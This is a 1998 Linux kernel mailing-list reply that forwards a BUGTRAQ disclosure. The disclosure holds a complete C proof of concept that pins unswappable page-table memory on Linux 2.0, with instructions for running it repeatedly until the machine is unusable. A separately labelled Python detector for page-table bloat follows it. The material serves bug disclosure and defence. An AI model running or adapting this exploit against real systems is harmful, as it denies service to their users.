Re: 2.1.125 Show stopper list: Draft

Chris Wedgwood (chris@cybernet.co.nz)
Wed, 14 Oct 1998 09:31:34 +1300



On Mon, Oct 12, 1998 at 08:54:04PM +0100, Alan Cox wrote:

> > What about the PGE/PTE problem? Any user can just mmap/munmap
> > all possible (768 under x86) page tables for their process, then
> > use up a lot of GFP_KERNEL
>
> Do you have a demo for this ?

Here is a message about it from BUGTRAQ some time back.

-cw


Date: Mon, 25 May 1998 13:51:42 +0200
From: XXX_p6mip300 <p6mip300@INFOP6.CICRP.JUSSIEU.FR>
Subject: linux 2.0 PTE bug
To: BUGTRAQ@NETSPACE.ORG

Hi all,

here is the program:
--------------------------------------------------------------------------
/* the pte bug - Sed hacking linux kernel, 24 may 1998 */

#include <signal.h>
#include <stdio.h>      /* perror */
#include <stdlib.h>     /* exit */
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

unsigned long address;      /* address whose page table we want allocated */
volatile int touch_me;      /* set by the handler once a page has been mapped */
int fd;

/* SIGSEGV handler: map one readable page at the faulting address so the
 * kernel has to allocate the page table covering it, then return so the
 * faulting load is retried and succeeds. */
void the_handler(int x)
{
    (void)x;
    signal(SIGSEGV, the_handler);

    touch_me++;

    if (mmap((void *)address, 4, PROT_READ,
             MAP_FIXED|MAP_PRIVATE, fd, 0) == (void *)-1) {
        perror("mmap");
        exit(1);
    }
}

int main(void)
{
    /* volatile to fool GCC, we _WANT_ access *address */
    volatile unsigned long i;

    fd = open("pte.c", O_RDONLY);
    if (fd == -1) {
        perror("open");
        exit(1);
    }

    signal(SIGSEGV, the_handler);

    /* 3*1024*1024*1024 = TASK_SIZE,
     * 1024*4096 = number of bytes one pte can map
     * (UL suffix because 3*1024*1024*1024 does not fit in a 32-bit int) */
    for (address = 0; address < 3UL*1024*1024*1024; address += 1024*4096) {
        i = *(unsigned long *)address;
        if (touch_me) {
            touch_me = 0;
            /* unmapping the page does not give the page table back on 2.0 */
            munmap((void *)address, 4);
        }
    }

    while (1)
        pause();
}
-----------------------------------------------------------------------

The idea is to take a lot of memory. So, we map all our virtual pages,
to force the system to allocate all the PTEs (I am talking about a PC box).
So, the process will have allocated 768 pages that will never be
swapped (that's the crucial point).

So, that's simple, you run this program as many times as you need to take
all the memory, and the PC won't be usable anymore (for my 64Mb box,
I need to run it about 20 times).

And then, you can have a wonderful light-show with your HD-led :) (PC will
spend its time in swapping).

How to solve it ?
Well, we could swap the pgd / pmd / pte, but I really don't know
if it is possible or what.

If this bug is already well known, I am sorry to disturb with it.

It applies only to the 2.0 kernel; for 2.1 (soon 2.2) I don't know
if it works, I will have to read the source.

Sed.
p6mip300@infop6.cicrp.jussieu.fr.
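A defender-side companion to the forwarded report, added here and not part of either message: it reproduces the report's arithmetic (768 page-table pages of 4 KiB pinned per process, about 20 copies for a 64 MB box) and flags a process whose page tables (VmPTE in /proc/<pid>/status on later kernels) are large relative to its resident set, which is the signature of a process that has touched one page in every 4 MiB window and then unmapped it. The /proc/<pid>/status samples are constructed.

```python
import re

PAGE_SIZE = 4096
TASK_SIZE = 3 * 1024 * 1024 * 1024      # 3 GiB user space on x86 (from the post)
BYTES_PER_PTE_PAGE = 1024 * 4096        # one page-table page maps 4 MiB (from the post)


def pte_pages_to_cover(task_size=TASK_SIZE, per_pte=BYTES_PER_PTE_PAGE):
    """Page-table pages needed to map the whole user address space (768 on x86)."""
    return task_size // per_pte


def pinned_pt_bytes_per_process(task_size=TASK_SIZE):
    """Unswappable page-table memory one process can force the 2.0 kernel to hold."""
    return pte_pages_to_cover(task_size) * PAGE_SIZE


def processes_to_pin_ram(ram_bytes):
    """Risk sizing: how many such processes pin all of `ram_bytes` (ceiling division)."""
    return -(-ram_bytes // pinned_pt_bytes_per_process())


# Lines of the form "VmPTE:\t    3084 kB" as printed in /proc/<pid>/status.
_KB_FIELD = re.compile(r"^(Vm\w+):\s+(\d+)\s+kB$", re.M)


def parse_status(text):
    """Return the Vm* fields of a status file as a dict of byte counts."""
    return {name: int(kb) * 1024 for name, kb in _KB_FIELD.findall(text)}


def pte_bloat(status, ratio=0.25):
    """True when page tables are at least `ratio` of resident memory.

    A normal process has VmPTE far below VmRSS; one that has mapped a single
    page in every 4 MiB window has page tables about as large as its RSS."""
    pte = status.get("VmPTE", 0)
    rss = status.get("VmRSS", 0)
    return rss > 0 and pte >= ratio * rss


# Constructed samples (not captured from a real system).
SAMPLE_NORMAL = "Name:\tbash\nVmRSS:\t    5120 kB\nVmPTE:\t      60 kB\n"
SAMPLE_SUSPECT = "Name:\tpte\nVmRSS:\t    3072 kB\nVmPTE:\t    3084 kB\n"

if __name__ == "__main__":
    print(pte_pages_to_cover(), pinned_pt_bytes_per_process() // 1024, "KiB pinned per process")
    print("64 MiB box:", processes_to_pin_ram(64 * 1024 * 1024), "processes")
    for sample in (SAMPLE_NORMAL, SAMPLE_SUSPECT):
        print(sample.split("\n")[0], "bloat:", pte_bloat(parse_status(sample)))
```

On a live system the same check can be applied to each /proc/<pid>/status; an RLIMIT_AS ceiling per user bounds how much address space, and hence how many page-table pages, one process can claim.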

